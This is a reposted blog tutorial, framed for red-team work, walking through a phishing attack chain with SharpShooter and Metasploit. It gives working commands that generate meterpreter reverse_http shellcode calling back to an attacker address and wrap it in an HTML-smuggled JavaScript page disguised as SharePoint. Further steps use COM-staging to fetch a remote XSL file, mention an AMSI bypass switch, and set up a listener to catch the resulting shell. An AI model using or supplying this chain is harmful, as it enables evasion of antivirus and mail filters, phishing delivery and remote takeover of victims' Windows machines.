SharpShooter - Metasploit - Java/Url attack

Article copied from 0x00sec.org

Author: pry0cc

Disclaimer

In no way to do I claim this to be my work, this is purely my take on this method, and if you want to read the original source of this information, please read it from here 48. This is an excellent method developed by Dominic Chell from Mdsec, and I wanted to re-write this in a way I think is more concise and holistic. As a side note, some images and videos may be sourced from that article.

One of the reasons I chose to do a write-up on this, especially when very good articles have already been written by mdsec 9, such as Payload Generation with Sharpshooter 28 and Freestyling with Sharpshooter 48, is because I feel there are certain things that are assumed that you know how to use; things such as --rawscfile payload generation.

In this article, I will assume previous metasploit + msfvenom experience, the concept of xsl’s (how to do it manually), and experience using the CLI in Linux.

This is a really easy way to generate undetectable payloads, and I am here to show you just how easy it is. If you’re already quite proficient, just scan down and read the code, I’m sure most of you are just skim reading this article anyway

Prerequisites

Something to keep in mind:

  • You can only use Python 2 with Sharpshooter. It will run with Python 3, but it’ll break stuff. Don’t ask me. It only caused me about 10 hours of trouble. (not quite, but you get the idea)

  • Cloned Repo + Setup of Sharpshooter 51

  • Cloned Repo/Install of metasploit framework 5 (Use rvm and install deps with bundler)

Generating your shellcode

You’ll need msfvenom for this task, in other examples of how to use sharpshooter, you’ll use things like csharp byte-arrays. For this example, we’ll be using straight up shellcode. Lucky for us, msfvenom actually will do this for us in one command.

Run the following:

./msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LHOST=192.168.1.221 LPORT=443 EnableStageEncoding=True PrependMigrate=True -f raw -o raw3.txt

Msfvenom creating shellcode

If you’ve used msfvenom before, you’ll know that this is just generating a payload for the x64 architecture (64bit), using the meterpreter reverse_http payload. The reverse_http payload option helps us to remain more stealthy, and slide past low-complexity packet inspection firewalls. For example, some firewalls allow you to allow “http” traffic. This will slide past that.

Generating your Payload

Now you’ve generated your shellcode, place the shellcode.txt file inside the same directory. Now if you’re using a distro such as Arch Linux, “Python” will be Python3 by default. Whereas on Ubuntu + Kali, it will be Python2 by default. You can easily verify which is true for you by running python --version.

Now run the following, with the correct python executable, for me, this was python2.

python2 SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile raw3.txt --smuggle --template sharepoint --com xslremote --awlurl http://192.168.1.221:8000/foo.xsl

Sharpshooter generating a payload

It is worth noting that this payload in order to bypass Windows Defender AMSI system requires switch "--amsi Use amsi bypass technique: amsienable" . Tested on 15.02.2019, with updated Windows 10 LTSC;

This will do multiple things. Firstly it will create a stageless payload, this means that it will not be staged, and therefore will have everything it needs inside the payload. This can be a bit misleading, as it will later pull a .xsl file, however as far as you need to know, this is a stageless payload.

Secondly, it will specify dotnet version 2 to use, you need to ensure that the target has this version of dotnet installed, if they do not, then this will fail. Most Windows targets have at least dotnet version 2, so this is usually fine.

Next we specify which payload type to use, in this case, I specify JS, however, we could easily also specify something such as vba.

After that, we use the --smuggle function. Some firewalls and security software blocks downloads of .js and .vba files, this --smuggle function wraps the file up inside the html file, encodes and encrypts it. On page load, the data is decrypted and decoded and saved as a blob. No more do spam filters that block malicious extensions work. (I love this feature). In the same breath, we specify a template, all this will do is make the page look more legitimate, in this case, we specify SharePoint as the template, this means that the phishing HTML will look like it is downloading from Microsoft Sharepoint.

Now we get to the exciting bit, com-staging. Com-staging is a term coined by Dom Chell from Mdsec, to break it down, some Microsoft applications such as Outlook, have functions that allow you to run shell commands, such as obj.CreateObject("Wscript.shell").run("fun commands"). This is leveraged by sharpshooter, and this in case, it is leveraging WMI to execute code from an XSL file.

Next, we need to specify our --awlurl, this will be where the xsl file will be located. In my case, I have specified at my http://myip:8000/file.xsl, because it is by default placed into the output folder, and I am going to run a python http server in there.

Serving up our Malicious files…

cd into the ./output directory, and run:

python3 -m http.server

This will create a basic python web server on port 8000, inside this directory.

Now, in another window, start your Metasploit handler.

sudo -E ./msfconsole
use exploit/multi/handler
set LHOST 192.168.1.221
set LPORT 443
set PAYLOAD windows/x64/meterpreter/reverse_http
set ExitOnSession false
exploit -j

Now you should have a reverse_http handler started. Simply ensure that ports 8000 and ports 443 are open. And now navigate to http://yourip:8000/foo.html. You should be able to open the files, and should receive a shell!

Recieving a shell connection in metasploit

Demo

Conclusion

Sharpshooter + SquibblyTwo with Com-staging is working an absolute treat to bypass AMSI, for now. Let’s see how long this lasts, for now though, we should abuse the hell out of this in red team assessments + advanced pentests. In future articles, I may begin to examine MacOS security and more… Stay tuned!